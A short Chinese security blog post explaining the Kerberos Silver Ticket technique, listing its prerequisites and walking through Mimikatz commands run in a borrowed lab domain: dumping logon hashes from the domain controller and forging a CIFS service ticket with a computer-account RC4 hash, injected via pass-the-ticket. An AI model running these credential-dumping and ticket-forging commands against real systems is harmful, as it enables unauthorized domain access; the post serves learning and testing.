论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

黄金票据是伪造 TGT,白银票据(Silver Ticket)是伪造 ST(Service Ticket),因为它不想黄金票据一样使用krgtgt账户的hash,而是使用计算机账户的hash进行加密的,所以只能获访问指定的权限。

前提条件:域名称、域SID、域服务账户的hash、伪造的用户名(任意用户或者不存在的用户)

环境原因这里没用自己部的,用的是klion师傅的域环境。
利用过程:
privilege::debug
sekurlsa::logonpasswords  进域控拿hash

获取sid

kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:OWA2010SP3.0day.org /service:cifs  /rc4:bec0097cc7cca53df5bfd48d85c48d68  /user:yangttt  /ptt

 

posted on 2020-02-27 23:27  Yangsir34  阅读(423)  评论(0编辑  收藏  举报